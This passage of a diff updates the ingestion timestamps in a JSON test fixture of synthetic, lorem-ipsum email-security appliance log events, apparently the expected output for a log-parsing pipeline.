user=ipsumq ui=atcu action=allow status=tessec msg=\"remipsum\"", "event": { - "ingested": "2021-06-29T09:33:00.526532200Z" + "ingested": "2021-12-09T13:37:30.096047Z" }, "tags": [ "preserve_original_event" @@ -114,7 +114,7 @@ }, "message": "date=2016-6-5 time=21:33:08 device_id=ntutl log_id=caecatc log_part=onsequat type=event subtype=update pri=low msg=\"edquiano\"", "event": { - "ingested": "2021-06-29T09:33:00.526537600Z" + "ingested": "2021-12-09T13:37:30.096053Z" }, "tags": [ "preserve_original_event" @@ -126,7 +126,7 @@ }, "message": "date=2016-6-20 time=04:35:42 device_id=idestla log_id=Nemoeni log_part=uradi type=statistics pri=very-high session_id=\"lup\" from=\"remeumf\" mailer=antiumto client_name=\"10.241.165.37\" MSISDN=aUteni resolved=ittenbyC to=\"aperi\" direction=\"inbound\" message_length=ita virus=\"ipi\" disposition=rsitamet classifier=\"lupt\" subject=\"xea\"", "event": { - "ingested": "2021-06-29T09:33:00.526543800Z" + "ingested": "2021-12-09T13:37:30.096059100Z" }, "tags": [ "preserve_original_event" @@ -138,7 +138,7 @@ }, "message": "date=2016-7-4 time=11:38:16 device_id=amvolup log_id=sequi log_part=rehend type=event subtype=webmail pri=high user=eme ui=numqu(10.232.149.140) action=allow status=lum msg=utali", "event": { - "ingested": "2021-06-29T09:33:00.526551600Z" + "ingested": "2021-12-09T13:37:30.096067700Z" }, "tags": [ "preserve_original_event" @@ -150,7 +150,7 @@ }, "message": "date=2016-7-18 time=18:40:50 device_id=estiae log_id=sci log_part=oei type=virus_file-signature pri=low snostrud to=nama src=\"10.24.67.250\" session_id=\"dolor\" msg=\"nnum\"", "event": { - "ingested": "2021-06-29T09:33:00.526558300Z" + "ingested": "2021-12-09T13:37:30.096074Z" }, "tags": [ "preserve_original_event" @@ -162,7 +162,7 @@ }, "message": "date=2016-8-2 time=01:43:25 device_id=oluptas log_id=tNequepo log_part=lup type=event subtype=update pri=medium msg=equat", "event": { - "ingested": "2021-06-29T09:33:00.526562600Z" + "ingested": "2021-12-09T13:37:30.096080Z" }, "tags": [ "preserve_original_event" @@ -174,7 +174,7 @@ }, "message": "date=2016-8-16 time=08:45:59 device_id=abi log_id=sectetur log_part=uioffi type=event subtype=update pri=high msg=veniamq", "event": { - "ingested": "2021-06-29T09:33:00.526566600Z" + "ingested": "2021-12-09T13:37:30.096086100Z" }, "tags": [ "preserve_original_event" @@ -186,7 +186,7 @@ }, "message": "date=2016-8-30 time=15:48:33 device_id=orem log_id=beata log_part=hitecto type=statistics pri=very-high session_id=\"texp\" client_name=\"[10.179.124.125]\"dst_ip=\"10.177.36.38\" from=\"sequine\" to=\"ectio\" polid=\"dutper\" domain=\"lamcolab3252.www.invalid\" subject=\"gel\" mailer=\"lorsitam\" resolved=\"mpo\" direction=\"inbound\" virus=\"ris\" disposition=\"uamqu\" classifier=\"lor\" message_length=oide", "event": { - "ingested": "2021-06-29T09:33:00.526570100Z" + "ingested": "2021-12-09T13:37:30.096092300Z" }, "tags": [ "preserve_original_event" @@ -198,7 +198,7 @@ }, "message": "date=2016-9-13 time=22:51:07 device_id=didunt log_id=uptatema log_part=intocc type=virus subtype=file-signature pri=very-high from=\"orema\" to=invento src=[10.164.39.248] session_id=\"nofdeFin\" msg=sequam", "event": { - "ingested": "2021-06-29T09:33:00.526575500Z" + "ingested": "2021-12-09T13:37:30.096096900Z" }, "tags": [ "preserve_original_event" @@ -210,7 +210,7 @@ }, "message": "date=2016-9-28 time=05:53:42 device_id=tvolu log_id=ecte log_part=tinvolu type=virus_file-signature pri=high from=\"ntiumdo\" to=\"autfu\" src=gnaaliq [10.52.135.156] session_id=\"litse\" msg=\"icabo\"", "event": { - "ingested": "2021-06-29T09:33:00.526581800Z" + "ingested": "2021-12-09T13:37:30.096101900Z" }, "tags": [ "preserve_original_event" @@ -222,7 +222,7 @@ }, "message": "date=2016-10-12 time=12:56:16 device_id=stru log_id=tectobe log_part=Nequepo type=event subtype=config pri=very-high user=pora ui=boree module=evolup submodule=ionofdeF msg=\"evelit\"", "event": { - "ingested": "2021-06-29T09:33:00.526586700Z" + "ingested": "2021-12-09T13:37:30.096107700Z" }, "tags": [ "preserve_original_event" @@ -234,7 +234,7 @@ }, "message": "date=2016-10-26 time=19:58:50 device_id=uatD log_id=ariatu log_part=edquiac type=event subtype=smtp pri=high user=atno ui=tani action=allow status=ntocca session_id=ostru log_part=ntoccae msg=autf", "event": { - "ingested": "2021-06-29T09:33:00.526590800Z" + "ingested": "2021-12-09T13:37:30.096113Z" }, "tags": [ "preserve_original_event" @@ -246,7 +246,7 @@ }, "message": "date=2016-11-10 time=03:01:24 device_id=tenimad log_id=minimav log_part=udexerci type=spam pri=very-high session_id=\"itam\" client_name=\"str976.internal.localhost [10.166.225.26]\" from=tanimid to=umdo subject=\"natuse\" msg=\"gnamal\"", "event": { - "ingested": "2021-06-29T09:33:00.526596600Z" + "ingested": "2021-12-09T13:37:30.096117400Z" }, "tags": [ "preserve_original_event" @@ -258,7 +258,7 @@ }, "message": "date=2016-11-24 time=10:03:59 device_id=intoc log_id=rQuisau log_part=itess type=virus subtype=infected pri=high from=evit to=\"runtm\" client_name=\"molli4306.www5.home\" client_ip=\"10.218.243.47\" session_id=\"borios\" msg=rsitvolu", "event": { - "ingested": "2021-06-29T09:33:00.526605100Z" + "ingested": "2021-12-09T13:37:30.096122400Z" }, "tags": [ "preserve_original_event" @@ -270,7 +270,7 @@ }, "message": "date=2016-12-8 time=17:06:33 device_id=quamqua log_id=eacommod log_part=ctetura type=event subtype=imap pri=high user=tpersp ui=stla action=allow status=sequamni msg=uradi", "event": { - "ingested": "2021-06-29T09:33:00.526611200Z" + "ingested": "2021-12-09T13:37:30.096128600Z" }, "tags": [ "preserve_original_event" @@ -282,7 +282,7 @@ }, "message": "date=2016-12-23 time=00:09:07 device_id=dolore log_id=onsecte log_part=nBCSedut type=virus subtype=file-signature pri=high from=\"modocons\" to=gitsed src=\"10.16.177.212\" session_id=\"emp\" msg=\"Attachment file (pisciv) has sha1 hash value: lumdolor\"", "event": { - "ingested": "2021-06-29T09:33:00.526617200Z" + "ingested": "2021-12-09T13:37:30.096133200Z" }, "tags": [ "preserve_original_event" @@ -294,7 +294,7 @@ }, "message": "date=2017-1-6 time=07:11:41 device_id=uaUten log_id=nby log_part=mve type=event subtype=config pri=low user=isau ui=rautodi(10.96.97.81) module=pis submodule=nsequat msg=doloreme", "event": { - "ingested": "2021-06-29T09:33:00.526622100Z" + "ingested": "2021-12-09T13:37:30.096137900Z" }, "tags": [ "preserve_original_event" @@ -306,7 +306,7 @@ }, "message": "date=2017-1-20 time=14:14:16 device_id=aec log_id=fdeF log_part=iquidexe type=spam pri=low session_id=\"niamq\" client_name= \"lapariat7287.internal.host\" client_ip=\"10.140.7.83\" dst_ip=\"10.68.246.187\" from=\"icabo\" to=\"gna\" subject=\"con\" msg=\"preh\"", "event": { - "ingested": "2021-06-29T09:33:00.526627500Z" + "ingested": "2021-12-09T13:37:30.096141700Z" }, "tags": [ "preserve_original_event" @@ -318,7 +318,7 @@ }, "message": "date=2017-2-3 time=21:16:50 device_id=amcor log_id=ica log_part=lillum type=event subtype=admin pri=very-high user=dicta ui=taedicta action=accept status=poriss reason=failure msg=equaturv", "event": { - "ingested": "2021-06-29T09:33:00.526635300Z" + "ingested": "2021-12-09T13:37:30.096146500Z" }, "tags": [ "preserve_original_event" @@ -330,7 +330,7 @@ }, "message": "date=2017-2-18 time=04:19:24 device_id=tpersp log_id=llamc log_part=nte type=event subtype=pop3 pri=very-high user=utali ui=porinc(10.48.204.44) action=accept status=dat msg=aincidu", "event": { - "ingested": "2021-06-29T09:33:00.526642900Z" + "ingested": "2021-12-09T13:37:30.096152900Z" }, "tags": [ "preserve_original_event" @@ -342,7 +342,7 @@ }, "message": "date=2017-3-4 time=11:21:59 device_id=dipisci log_id=spernatu log_part=admi type=event subtype=pop3 pri=very-high user=quunt ui=olori action=allow status=autodit msg=elit", "event": { - "ingested": "2021-06-29T09:33:00.526650100Z" + "ingested": "2021-12-09T13:37:30.096159100Z" }, "tags": [ "preserve_original_event" @@ -354,7 +354,7 @@ }, "message": "date=2017-3-18 time=18:24:33 device_id=nte log_id=ulpa log_part=sitam type=virus subtype=file-signature pri=low enderit to=sequa src=\"[10.111.233.194]\" session_id=eirure msg=deserun", "event": { - "ingested": "2021-06-29T09:33:00.526657500Z" + "ingested": "2021-12-09T13:37:30.096165200Z" }, "tags": [ "preserve_original_event" @@ -366,7 +366,7 @@ }, "message": "date=2017-4-2 time=01:27:07 device_id=ptateve log_id=enderi log_part=ptatem type=event subtype=smtp pri=very-high user=fugi ui=labo action=block status=ullamcor session_id=itationu msg=proident", "event": { - "ingested": "2021-06-29T09:33:00.526664900Z" + "ingested": "2021-12-09T13:37:30.096171200Z" }, "tags": [ "preserve_original_event" @@ -378,7 +378,7 @@ }, "message": "date=2017-4-16 time=08:29:41 device_id=atione log_id=lores log_part=ritati type=statistics pri=very-high session_id=uii client_name=estl5804.internal.local client_ip=10.73.207.70 dst_ip=10.179.210.218 from=taut hfrom=tanimi to=rumSecti polid=iuntNe domain=atise3421.www5.localdomain mailer=oluptas resolved=emvele src_type=isnost direction=inbound virus=Sedut disposition=yCiceroi classifier=quunt message_length=acommod subject=sitvol", "event": { - "ingested": "2021-06-29T09:33:00.526668900Z" + "ingested": "2021-12-09T13:37:30.096177200Z" }, "tags": [ "preserve_original_event" @@ -390,7 +390,7 @@ }, "message": "date=2017-4-30 time=15:32:16 device_id=liquide log_id=odt log_part=Sedutpe type=event subtype=admin pri=medium user=rroq ui=rcit(10.43.62.246) action=accept status=estl reason=success msg=citatio", "event": { - "ingested": "2021-06-29T09:33:00.526697400Z" + "ingested": "2021-12-09T13:37:30.096183300Z" }, "tags": [ "preserve_original_event" @@ -402,7 +402,7 @@ }, "message": "date=2017-5-14 time=22:34:50 device_id=taedict log_id=edquian log_part=loremeu type=event subtype=admin pri=very-high user=volupta ui=dmi action=allow status=aaliq reason=unknown msg=lupta", "event": { - "ingested": "2021-06-29T09:33:00.526703400Z" + "ingested": "2021-12-09T13:37:30.096189400Z" }, "tags": [ "preserve_original_event" @@ -414,7 +414,7 @@ }, "message": "date=2017-5-29 time=05:37:24 device_id=occ log_id=oloreseo log_part=iruredol type=virus subtype=file-signature pri=very-high derit to=orese src=\"[10.28.105.124]\" session_id=\"strude\" msg=eritin", "event": { - "ingested": "2021-06-29T09:33:00.526710Z" + "ingested": "2021-12-09T13:37:30.096195600Z" }, "tags": [ "preserve_original_event" @@ -426,7 +426,7 @@ }, "message": "date=2017-6-12 time=12:39:58 device_id=temUten log_id=dutper log_part=sitamet type=event subtype=admin pri=very-high user=illumqui ui=saq action=block status=ritqu reason=unknown msg=\"idolor\"", "event": { - "ingested": "2021-06-29T09:33:00.526718Z" + "ingested": "2021-12-09T13:37:30.096201700Z" }, "tags": [ "preserve_original_event" @@ -438,7 +438,7 @@ }, "message": "date=2017-6-26 time=19:42:33 device_id=quide log_id=quaU log_part=undeomni type=virus_file-signature pri=medium acomm to=iutali src=\"[10.219.13.150]\" session_id=Finibus msg=radi", "event": { - "ingested": "2021-06-29T09:33:00.526741800Z" + "ingested": "2021-12-09T13:37:30.096207700Z" }, "tags": [ "preserve_original_event" @@ -450,7 +450,7 @@ }, "message": "date=2017-7-11 time=02:45:07 device_id=inrepr log_id=mol log_part=umdolors type=event subtype=pop3 pri=medium user=imad ui=oriosam(10.163.114.215) action=deny status=sitametc msg=onsequa", "event": { - "ingested": "2021-06-29T09:33:00.526746100Z" + "ingested": "2021-12-09T13:37:30.096213900Z" }, "tags": [ "preserve_original_event" @@ -462,7 +462,7 @@ }, "message": "date=2017-7-25 time=09:47:41 device_id=riosa log_id=tNe log_part=pisc type=event subtype=webmail pri=very-high user=caecat ui=rautod(10.124.32.120) action=accept status=atcupi msg=atem", "event": { - "ingested": "2021-06-29T09:33:00.526750Z" + "ingested": "2021-12-09T13:37:30.096220100Z" }, "tags": [ "preserve_original_event" @@ -474,7 +474,7 @@ }, "message": "date=2017-8-8 time=16:50:15 device_id=undeom log_id=emullamc log_part=tec type=event subtype=imap pri=medium user=eetdo ui=tlab action=cancel status=liq msg=seddoeiu", "event": { - "ingested": "2021-06-29T09:33:00.526753500Z" + "ingested": "2021-12-09T13:37:30.096226200Z" }, "tags": [ "preserve_original_event" @@ -486,7 +486,7 @@ }, "message": "date=2017-8-22 time=23:52:50 device_id=edictasu log_id=mdolors log_part=oremi type=event subtype=imap pri=medium user=atis ui=atDuis action=accept status=nisiut msg=\"rumwri\"", "event": { - "ingested": "2021-06-29T09:33:00.526758700Z" + "ingested": "2021-12-09T13:37:30.096232300Z" }, "tags": [ "preserve_original_event" @@ -498,7 +498,7 @@ }, "message": "date=2017-9-6 time=06:55:24 device_id=lumqu log_id=onulamco log_part=ons type=event subtype=pop3 pri=low user=uptat ui=unt action=accept status=uido msg=tla", "event": { - "ingested": "2021-06-29T09:33:00.526764Z" + "ingested": "2021-12-09T13:37:30.096238400Z" }, "tags": [ "preserve_original_event" @@ -510,7 +510,7 @@ }, "message": "date=2017-9-20 time=13:57:58 device_id=uamqu log_id=olori log_part=ido type=spam pri=low session_id=\"sunt\" from=\"autfugit\" to=\"emUte\" msg=iusmodi", "event": { - "ingested": "2021-06-29T09:33:00.526770600Z" + "ingested": "2021-12-09T13:37:30.096242900Z" }, "tags": [ "preserve_original_event" @@ -522,7 +522,7 @@ }, "message": "date=2017-10-4 time=21:00:32 device_id=umS log_id=iciadese log_part=riatur type=event subtype=webmail pri=very-high user=xeacommo ui=Cicero(10.247.53.179) action=cancel status=ditau msg=atemaccu", "event": { - "ingested": "2021-06-29T09:33:00.526779300Z" + "ingested": "2021-12-09T13:37:30.096247900Z" }, "tags": [ "preserve_original_event" @@ -534,7 +534,7 @@ }, "message": "date=2017-10-19 time=04:03:07 device_id=urau log_id=etur log_part=rsitvol type=event subtype=config pri=low user=laborum ui=ostr(10.70.91.185) module=lumdo submodule=acom msg=\"eFini\"", "event": { - "ingested": "2021-06-29T09:33:00.526787Z" + "ingested": "2021-12-09T13:37:30.096253500Z" }, "tags": [ "preserve_original_event" @@ -546,7 +546,7 @@ }, "message": "date=2017-11-2 time=11:05:41 device_id=upta log_id=itessequ log_part=iusmodit type=event subtype=update pri=very-high msg=exerci", "event": { - "ingested": "2021-06-29T09:33:00.526794200Z" + "ingested": "2021-12-09T13:37:30.096258800Z" }, "tags": [ "preserve_original_event" @@ -558,7 +558,7 @@ }, "message": "date=2017-11-16 time=18:08:15 device_id=mmodoco log_id=amni log_part=atnul type=event subtype=webmail pri=medium user=iquidexe ui=illumq(10.215.65.52) action=accept status=tasnul msg=\"tuserr\"", "event": { - "ingested": "2021-06-29T09:33:00.526801600Z" + "ingested": "2021-12-09T13:37:30.096263Z" }, "tags": [ "preserve_original_event" @@ -570,7 +570,7 @@ }, "message": "date=2017-12-1 time=01:10:49 device_id=porinc log_id=riame log_part=riat type=event subtype=admin pri=medium user=rumSec ui=orp action=deny status=udan reason=unknown msg=\"essequam\"", "event": { - "ingested": "2021-06-29T09:33:00.526809Z" + "ingested": "2021-12-09T13:37:30.096268100Z" }, "tags": [ "preserve_original_event" @@ -582,7 +582,7 @@ }, "message": "date=2017-12-15 time=08:13:24 device_id=itse log_id=ilm log_part=mvel type=virus subtype=infected pri=high from=seos to=exercita client_name=\"edolori3822.api.home\" client_ip=\"10.63.177.46\" session_id=\"oluptate\" msg=lit", "event": { - "ingested": "2021-06-29T09:33:00.526832700Z" + "ingested": "2021-12-09T13:37:30.096274400Z" }, "tags": [ "preserve_original_event" @@ -594,7 +594,7 @@ }, "message": "date=2017-12-29 time=15:15:58 device_id=iciade log_id=uis log_part=amc type=event subtype=webmail pri=medium user=Ute ui=ptassita action=allow status=runtm msg=\"eturadip\"", "event": { - "ingested": "2021-06-29T09:33:00.526840Z" + "ingested": "2021-12-09T13:37:30.096279Z" }, "tags": [ "preserve_original_event" @@ -606,7 +606,7 @@ }, "message": "date=2018-1-12 time=22:18:32 device_id=colabori log_id=imidestl log_part=piscing type=virus subtype=file-signature pri=high from=\"isn\" to=smod src=\"idunt [10.29.120.226]\" session_id=\"atev\" msg=\"ectio\"", "event": { - "ingested": "2021-06-29T09:33:00.526847400Z" + "ingested": "2021-12-09T13:37:30.096283500Z" }, "tags": [ "preserve_original_event" @@ -618,7 +618,7 @@ }, "message": "date=2018-1-27 time=05:21:06 device_id=atcupid log_id=onse log_part=psa type=virus_file-signature pri=high destla to=\"fugitse\" src=[10.12.86.130] session_id=dese msg=\"Attachment file (duntutla) has sha1 hash value: lamco\"", "event": { - "ingested": "2021-06-29T09:33:00.526851500Z" + "ingested": "2021-12-09T13:37:30.096287300Z" }, "tags": [ "preserve_original_event" @@ -630,7 +630,7 @@ }, "message": "date=2018-2-10 time=12:23:41 device_id=gna log_id=ici log_part=quamnih type=event subtype=pop3 pri=low user=iameaque ui=identsun action=deny status=aquio msg=\"rspicia\"", "event": { - "ingested": "2021-06-29T09:33:00.526854800Z" + "ingested": "2021-12-09T13:37:30.096292200Z" }, "tags": [ "preserve_original_event" @@ -642,7 +642,7 @@ }, "message": "date=2018-2-24 time=19:26:15 device_id=uiineavo log_id=sistena log_part=uidexeac type=virus subtype=infected pri=high from=\"amquisno\" to=modoc client_name=\"magnam3267.corp\" client_ip=\"10.95.32.86\" session_id=\"Bonorum\" msg=lesti", "event": { - "ingested": "2021-06-29T09:33:00.526859900Z" + "ingested": "2021-12-09T13:37:30.096298300Z" }, "tags": [ "preserve_original_event" @@ -654,7 +654,7 @@ }, "message": "date=2018-3-11 time=02:28:49 device_id=lupta log_id=byC log_part=imadm type=spam pri=low session_id=\"nci\" from=\"orroquis\" to=\"ulapa\" subject=\"iumdo\" msg=\"iusmodit\"", "event": { - "ingested": "2021-06-29T09:33:00.526865100Z" + "ingested": "2021-12-09T13:37:30.096304500Z" }, "tags": [ "preserve_original_event" @@ -666,7 +666,7 @@ }, "message": "date=2018-3-25 time=09:31:24 device_id=obeataev log_id=umf log_part=olesti type=event subtype=config pri=low user=quaeabil ui=emip module=aturQu submodule=itesse msg=\"iamqui\"", "event": { - "ingested": "2021-06-29T09:33:00.526871500Z" + "ingested": "2021-12-09T13:37:30.096310500Z" }, "tags": [ "preserve_original_event" @@ -678,7 +678,7 @@ }, "message": "date=2018-4-8 time=16:33:58 device_id=inim log_id=etdol log_part=Sed type=event subtype=pop3 pri=very-high user=tten ui=etur action=allow status=mipsumqu msg=\"eprehen\"", "event": { - "ingested": "2021-06-29T09:33:00.526875300Z" + "ingested": "2021-12-09T13:37:30.096316700Z" }, "tags": [ "preserve_original_event" @@ -690,7 +690,7 @@ }, "message": "date=2018-4-22 time=23:36:32 device_id=itaedict log_id=olorema log_part=rep type=event subtype=update pri=low msg=ptatemse", "event": { - "ingested": "2021-06-29T09:33:00.526880500Z" + "ingested": "2021-12-09T13:37:30.096322800Z" }, "tags": [ "preserve_original_event" @@ -702,7 +702,7 @@ }, "message": "date=2018-5-7 time=06:39:06 device_id=eleumi log_id=edic log_part=udexerc type=event subtype=pop3 pri=low user=olabori ui=odic action=block status=lica msg=secil", "event": { - "ingested": "2021-06-29T09:33:00.526886400Z" + "ingested": "2021-12-09T13:37:30.096328800Z" }, "tags": [ "preserve_original_event" @@ -714,7 +714,7 @@ }, "message": "date=2018-5-21 time=13:41:41 device_id=nimadmin log_id=midest log_part=modt type=event subtype=update pri=very-high msg=tocca", "event": { - "ingested": "2021-06-29T09:33:00.526890Z" + "ingested": "2021-12-09T13:37:30.096334800Z" }, "tags": [ "preserve_original_event" @@ -726,7 +726,7 @@ }, "message": "date=2018-6-4 time=20:44:15 device_id=usant log_id=mipsumq log_part=ident type=event subtype=config pri=very-high user=sequatD ui=ercitati(10.40.89.185) module=temse submodule=caecat msg=\"cusanti\"", "event": { - "ingested": "2021-06-29T09:33:00.526893900Z" + "ingested": "2021-12-09T13:37:30.096340900Z" }, "tags": [ "preserve_original_event" @@ -738,7 +738,7 @@ }, "message": "date=2018-6-19 time=03:46:49 device_id=conseq log_id=itame log_part=tenat type=virus subtype=infected pri=very-high from=\"yCiceroi\" to=\"nostrum\" client_name=\"orroquis5179.local\" client_ip=\"10.252.96.71\" session_id=\"tvolu\" msg=\"dutper\"", "event": { - "ingested": "2021-06-29T09:33:00.526899Z" + "ingested": "2021-12-09T13:37:30.096347Z" }, "tags": [ "preserve_original_event" @@ -750,7 +750,7 @@ }, "message": "date=2018-7-3 time=10:49:23 device_id=ugiatqu log_id=eruntmo log_part=nimve type=virus subtype=infected pri=very-high from=natus to=boreet client_name=\"luptasnu757.www.home\" client_ip=\"10.174.210.232\" session_id=ovolupta msg=\"volup\"", "event": { - "ingested": "2021-06-29T09:33:00.526903300Z" + "ingested": "2021-12-09T13:37:30.096355800Z" }, "tags": [ "preserve_original_event" @@ -762,7 +762,7 @@ }, "message": "date=2018-7-17 time=17:51:58 device_id=Bonoru log_id=rcitati log_part=nula type=event subtype=imap pri=medium user=deomni ui=adipi(10.120.232.62) action=block status=ntutl msg=\"volupt\"", "event": { - "ingested": "2021-06-29T09:33:00.526909700Z" + "ingested": "2021-12-09T13:37:30.096362300Z" }, "tags": [ "preserve_original_event" @@ -774,7 +774,7 @@ }, "message": "date=2018-8-1 time=00:54:32 device_id=mquameiu log_id=loremq log_part=turmagni type=event subtype=imap pri=very-high user=emUtenim ui=ende action=block status=amnis msg=rvelil", "event": { - "ingested": "2021-06-29T09:33:00.526970600Z" + "ingested": "2021-12-09T13:37:30.096368400Z" }, "tags": [ "preserve_original_event" @@ -786,7 +786,7 @@ }, "message": "date=2018-8-15 time=07:57:06 device_id=rumetMa log_id=mexerci log_part=urEx type=virus subtype=file-signature pri=medium liq to=abore src=10.200.225.45 session_id=dol msg=exe", "event": { - "ingested": "2021-06-29T09:33:00.526998100Z" + "ingested": "2021-12-09T13:37:30.096374600Z" }, "tags": [ "preserve_original_event" @@ -798,7 +798,7 @@ }, "message": "date=2018-8-29 time=14:59:40 device_id=audant log_id=rspicia log_part=pitl type=statistics pri=high session_id=mmod client_name=taevit4968.mail.local client_ip=10.144.111.42 dst_ip=10.62.61.1 from=lam hfrom=asnu to=com polid=rep domain=mveni5084.internal.local mailer=num resolved=ctetura src_type=quaerat direction=inbound virus=umexer disposition=amnih classifier=tper message_length=pisciv subject=tconsect", "event": { - "ingested": "2021-06-29T09:33:00.527006100Z" + "ingested": "2021-12-09T13:37:30.096380700Z" }, "tags": [ "preserve_original_event" @@ -810,7 +810,7 @@ }, "message": "date=2018-9-12 time=22:02:15 device_id=emipsumq log_id=culpaq log_part=quamq type=event subtype=pop3 pri=medium user=emvel ui=pta(10.183.213.223) action=block status=hend msg=remagna", "event": { - "ingested": "2021-06-29T09:33:00.527009800Z" + "ingested": "2021-12-09T13:37:30.096386300Z" }, "tags": [ "preserve_original_event" @@ -822,7 +822,7 @@ }, "message": "date=2018-9-27 time=05:04:49 device_id=lauda log_id=plicaboN log_part=dolo type=virus subtype=file-signature pri=medium from=\"elit\" to=sam src=\"tMal [10.52.190.18]\" session_id=isni msg=quid", "event": { - "ingested": "2021-06-29T09:33:00.527015300Z" + "ingested": "2021-12-09T13:37:30.096390100Z" }, "tags": [ "preserve_original_event" @@ -834,7 +834,7 @@ }, "message": "date=2018-10-11 time=12:07:23 device_id=inibus log_id=secte log_part=ctobeat type=event subtype=config pri=low user=iqui ui=animide module=pid submodule=itanimi msg=\"onoru\"", "event": { - "ingested": "2021-06-29T09:33:00.527020500Z" + "ingested": "2021-12-09T13:37:30.096394900Z" }, "tags": [ "preserve_original_event" @@ -846,7 +846,7 @@ }, "message": "date=2018-10-25 time=19:09:57 device_id=naaliq log_id=plica log_part=asiarc type=event subtype=imap pri=low user=seq ui=snula(10.203.110.206) action=deny status=dipi msg=ecatc", "event": { - "ingested": "2021-06-29T09:33:00.527026600Z" + "ingested": "2021-12-09T13:37:30.096400600Z" }, "tags": [ "preserve_original_event" @@ -858,7 +858,7 @@ }, "message": "date=2018-11-9 time=02:12:32 device_id=dolo log_id=velites log_part=oloremi type=virus_file-signature pri=high apari to=tsunt src=\"caecat [10.108.10.197]\" session_id=enim msg=\"Attachment file (umq) has sha1 hash value: sistena\"", "event": { - "ingested": "2021-06-29T09:33:00.527033900Z" + "ingested": "2021-12-09T13:37:30.096405800Z" }, "tags": [ "preserve_original_event" @@ -870,7 +870,7 @@ }, "message": "date=2018-11-23 time=09:15:06 device_id=imipsam log_id=eumiu log_part=tatevel type=event subtype=smtp pri=high user=quisnostui=sequines(10.115.154.104) action=cancelstatus=lorumsession_id=\"suntexpl\" msg=\"DSN: to \u003c\u003ciqu\u003e; reason:success; sessionid:tatis\"", "event": { - "ingested": "2021-06-29T09:33:00.527041200Z" + "ingested": "2021-12-09T13:37:30.096410100Z" }, "tags": [ "preserve_original_event" @@ -882,7 +882,7 @@ }, "message": "date=2018-12-7 time=16:17:40 device_id=econ log_id=aborio log_part=rve type=event subtype=smtp pri=medium user=nbyCiui=runtmollaction=blockstatus=velillumsession_id=\"ionev\" msg=\"to=\u003c\u003cvitaedi\u003e, delay=rna, xdelay=cons, mailer=ipv6-icmp, pri=lupta, relay=olaboris3175.internal.home[10.250.94.95], dsn=tno, stat=imvenia\"", "event": { - "ingested": "2021-06-29T09:33:00.527048500Z" + "ingested": "2021-12-09T13:37:30.096415Z" }, "tags": [ "preserve_original_event" @@ -894,7 +894,7 @@ }, "message": "date=2018-12-21 time=23:20:14 device_id=atevelit log_id=ugitsed log_part=dminimve type=virus subtype=file-signature pri=very-high from=\"onse\" to=uiac src=tquii [10.164.49.95] session_id=emeumfu msg=\"inBCSedu\"", "event": { - "ingested": "2021-06-29T09:33:00.527055900Z" + "ingested": "2021-12-09T13:37:30.096421400Z" }, "tags": [ "preserve_original_event" @@ -906,7 +906,7 @@ }, "message": "date=2019-1-5 time=06:22:49 device_id=ddo log_id=emp log_part=inBC type=event subtype=smtp pri=low user=eacommui=aboNem(10.11.45.141) action=allowstatus=remasession_id=\"mcol\"msg=\"STARTTLS=tion, cert-subject=umquia, cert-issuer=lorsita, verifymsg=spici\"", "event": { - "ingested": "2021-06-29T09:33:00.527063Z" + "ingested": "2021-12-09T13:37:30.096426Z" }, "tags": [ "preserve_original_event" @@ -918,7 +918,7 @@ }, "message": "date=2019-1-19 time=13:25:23 device_id=odit log_id=vol log_part=epteurs type=statistics pri=very-high session_id=\"cteturad\" client_name=\"modi6930.internal.test[10.60.164.100]\"dst_ip=\"10.161.1.146\" from=\"etconse\" to=\"nproiden\" polid=\"ionem\" domain=\"taevitae6868.www.corp\" subject=\"ehende\" mailer=\"rep\" resolved=\"nostru\" direction=\"internal\" virus=\"ipiscin\" disposition=\"trudexe\" classifier=\"qua\" message_length=modit", "event": { - "ingested": "2021-06-29T09:33:00.527107300Z" + "ingested": "2021-12-09T13:37:30.096430500Z" }, "tags": [ "preserve_original_event" @@ -930,7 +930,7 @@ }, "message": "date=2019-2-2 time=20:27:57 device_id=orsit log_id=deFinibu log_part=iaecons type=event subtype=admin pri=very-high user=rautod ui=onorumet(10.157.118.41) action=cancel status=chit reason=unknown msg=\"erspici\"", "event": { - "ingested": "2021-06-29T09:33:00.527110700Z" + "ingested": "2021-12-09T13:37:30.096434300Z" }, "tags": [ "preserve_original_event" @@ -942,7 +942,7 @@ }, "message": "date=2019-2-17 time=03:30:32 device_id=quidol log_id=tinv log_part=Utenima type=statistics pri=high session_id=temqu client_name=uradip7802.mail.example client_ip=10.44.35.57 dst_ip=10.93.239.216 from=vento hfrom=litsed to=ciun polid=rehender domain=tetura7106.www5.corp mailer=eosquir resolved=tqu src_type=emips direction=internal virus=tinvolu disposition=ptat classifier=amquisn message_length=Finibus subject=nsequat", "event": { - "ingested": "2021-06-29T09:33:00.527116200Z" + "ingested": "2021-12-09T13:37:30.096439100Z" }, "tags": [ "preserve_original_event" @@ -954,7 +954,7 @@ }, "message": "date=2019-3-3 time=10:33:06 device_id=evelite log_id=remquela log_part=toreve type=event subtype=update pri=high msg=\"dolor\"", "event": { - "ingested": "2021-06-29T09:33:00.527120800Z" + "ingested": "2021-12-09T13:37:30.096445300Z" }, "tags": [ "preserve_original_event" @@ -966,7 +966,7 @@ }, "message": "date=2019-3-17 time=17:35:40 device_id=itse log_id=lapari log_part=Bonor type=event subtype=update pri=medium msg=exeaco", "event": { - "ingested": "2021-06-29T09:33:00.527124600Z" + "ingested": "2021-12-09T13:37:30.096451500Z" }, "tags": [ "preserve_original_event" @@ -978,7 +978,7 @@ }, "message": "date=2019-4-1 time=00:38:14 device_id=emvele log_id=tNeq log_part=olorsita type=virus_file-signature pri=medium eleumiu to=etdol src=\"imadmin [10.123.154.140]\" session_id=liqu msg=dolor", "event": { - "ingested": "2021-06-29T09:33:00.527128400Z" + "ingested": "2021-12-09T13:37:30.096457600Z" }, "tags": [ "preserve_original_event" @@ -990,7 +990,7 @@ }, "message": "date=2019-4-15 time=07:40:49 device_id=aliq log_id=utem log_part=oreetd type=event subtype=imap pri=very-high user=mremape ui=ude action=deny status=emac msg=rmagnido", "event": { - "ingested": "2021-06-29T09:33:00.527132200Z" + "ingested": "2021-12-09T13:37:30.096463600Z" }, "tags": [ "preserve_original_event" @@ -1002,7 +1002,7 @@ }, "message": "date=2019-4-29 time=14:43:23 device_id=pariatur log_id=cita log_part=tvo type=event subtype=admin pri=high user=rve ui=atemacc(10.141.108.1) action=deny status=ciunt reason=success msg=\"beataevi\"", "event": { - "ingested": "2021-06-29T09:33:00.527136900Z" + "ingested": "2021-12-09T13:37:30.096469700Z" }, "tags": [ "preserve_original_event" @@ -1014,7 +1014,7 @@ }, "message": 